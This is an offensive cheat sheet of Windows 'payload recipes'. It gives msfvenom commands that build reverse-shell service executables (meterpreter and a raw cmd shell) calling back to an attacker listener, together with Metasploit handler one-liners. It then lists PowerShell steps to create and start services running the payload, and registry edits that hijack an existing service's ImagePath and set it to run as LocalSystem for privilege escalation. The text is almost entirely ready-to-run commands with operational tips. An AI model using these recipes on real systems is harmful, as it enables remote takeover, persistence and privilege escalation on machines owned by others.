Payload recipes
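# --- windows/x64/meterpreter/reverse_tcp ---
# Build a service-format payload with msfvenom. `-f exe-service` wraps the
# payload in an executable that registers with the Service Control Manager;
# a plain `-f exe` started as a service is killed by the SCM when it does not
# report "running" within the start timeout (error 1053), even if the payload
# has already run. Replace x.x.x.x with a listener address the target can
# reach; LHOST/LPORT must match the handler below.
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=4444 -f exe-service -o evil-service.exe
# Metasploit listener for the payload above. The handler's payload string must
# be exactly the one given to msfvenom (staged meterpreter here) - a staged /
# stageless mismatch typically leaves a connect-back that never completes.
# Start the handler before the service is started on the target. Note that
# reverse_tcp is unencrypted on the wire; use a *_https variant if that matters.
msfconsole -q -x "use exploit/multi/handler;set payload windows/x64/meterpreter/reverse_tcp;set LHOST x.x.x.x;set LPORT 4444;run"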
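# --- windows/x64/shell_reverse_tcp ---
# Same recipe, but with a stageless plain command shell instead of meterpreter.
# `-f exe-service` is still required so the SCM accepts the binary as a service.
# This writes to the same output name as the meterpreter recipe above, so the
# second build overwrites the first if both are run in one directory.
msfvenom -p windows/x64/shell_reverse_tcp LHOST=x.x.x.x LPORT=4444 -f exe-service -o evil-service.exe
# Metasploit listener (windows/x64/shell_reverse_tcp). The payload set on the
# handler must match the one built with msfvenom; LHOST/LPORT likewise.
# shell_reverse_tcp is a raw, unencrypted cmd.exe over TCP.
msfconsole -q -x "use exploit/multi/handler;set payload windows/x64/shell_reverse_tcp;set LHOST x.x.x.x;set LPORT 4444;run"
# The service-management commands that follow must be run with elevated
# privileges on the target; a PowerShell session spawned via PsExec works well.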
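# --- Service management (elevated PowerShell) ---
# Interactively create a new service. Each value is prompted via Read-Host and
# used as-is. If the binary path contains spaces, type the surrounding quotes
# into the prompt yourself, otherwise the SCM treats the first token as the
# executable. New-Service fails if a service with that name already exists.
New-Service -Name (Read-Host "Service name") -DisplayName (Read-Host "Displayname") -Description (Read-Host "Description") -BinaryPathName (Read-Host "Binpath") -StartupType Automatic
# Start the service. With an exe-service payload the start succeeds and the
# session should arrive at the handler; a non-service binary makes
# Start-Service throw after the SCM timeout even though it may have run.
Start-Service -Name (Read-Host "Service name")
# Stop the service.
Stop-Service -Name (Read-Host "Service name")
# Get the BinPath (PathName) of a service. The name is interpolated into a WQL
# filter inside single quotes; a name containing a single quote breaks the
# query, so use the exact service name. Get-WmiObject exists only in Windows
# PowerShell 5.1 and earlier - on PowerShell 7 use Get-CimInstance instead.
Get-WmiObject -Class Win32_Service -Filter "Name='$(Read-Host "Service name")'" | Select-Object PathName
# Get all properties of a service (StartName shows the logon account, State the
# current status) - useful to verify the changes made above or via the registry.
Get-WmiObject -Class Win32_Service -Filter "Name='$(Read-Host "Service name")'" | Select-Object *
# The registry edits below could possibly be run with lower privileges, e.g. as a
# member of 'Backup Operators'; success depends on the DACL of the service's
# registry key, which can be checked with Get-Acl before trying.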
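# --- Service reconfiguration via the registry ---
# Writing the service's registry key directly bypasses the SCM API (sc.exe /
# Set-Service), so it can succeed where those are denied, provided the key's
# DACL grants write access to the current principal (check with Get-Acl on the
# key). The SCM reads these values when the service next starts, so the change
# only takes effect after the service is (re)started.
# Set the BinPath of an existing service by overwriting its ImagePath value.
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\$(Read-Host "Service name")" -Name "ImagePath" -Value (Read-Host "Binpath")
# Set the service's logon account to LocalSystem. ObjectName is the account the
# service runs as, not the start type (that is the "Start" value). LocalSystem
# needs no stored password, so no further values have to be touched.
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\$(Read-Host "Service name")" -Name "ObjectName" -Value "LocalSystem"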